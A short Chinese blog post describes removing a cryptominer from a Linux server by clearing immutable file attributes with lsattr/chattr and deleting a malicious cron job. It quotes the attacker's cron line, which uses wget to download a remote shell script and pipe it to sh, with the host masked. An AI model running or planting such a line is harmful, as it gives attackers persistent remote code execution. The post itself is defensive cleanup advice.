黑客挖矿

遇到这种情况的话,证明你是在一个小公司里
首先使用top命令,你可以看到占用资源比较稳定,最多的,一般就是了。
有的看不出来。-------------------不好意思,当时候没有意识到要写博客,所以就没有贴图了,请理解。

1.你可以在/etc目录下找到httpdz 和initdz等文件。你删除,结果删除不了。
查询了一下,才知道它们被赋予了特殊权限。
查询命令:lsattr 文件名
然后你可以看到它的权限是-------ai---------e 。
使用命令:chattr -ai 文件名 (+是加权限,-是减权限)
然后使用命令rm -rf 文件名 就可以删除了。
注:当然,这样删除肯定是不行的。过一段时间,他还会出来,我很纳闷,因为我已经改了root密码,并改成其他用户跳转root

2.它能再次执行:(1).说明我们没有删到根本的东西,(2)就是它肯定是配置定时了。
然后又找进程,发现在/etc/下还有别的进程那两个记得不清楚了。
删除了,以后还是过一会又重新有了,进程。没办法,只能看定时任务了。

3.查看定时任务,发现是乱码,然后命令里有 /12 * * * * wget -NfFS .cmd http:******/lll.sh .cmd |sh
大概是这样的定时任务。
很明显,他是通过这个网址下载了一个脚本。然后执行的进程。
然后crontab -e 删除命令行。(一定要注意,别删除定时任务,要和其他人员沟通好,再做决定。)
你发现删除不了定时任务,于是我猜想是crontab的命令行文件应该付了特殊权限,结果确实是。
继续用 lsattr /var/spoon/cron/root
chattr -ia /var/spoon/cron/root
然后把里边的挖矿的定时任务删除。然后再看进程就没了。
在这以后在观察一段时间,发现在cpu变得很低,内存也下降了好多。观察了很长时间也没有异常。
注意(一定要删除定时任务后,在观察进程,如果还有就删除在观察,找找其他进程)

这是自己的一个小思路,仅供参考。

你可能感兴趣的:(安全)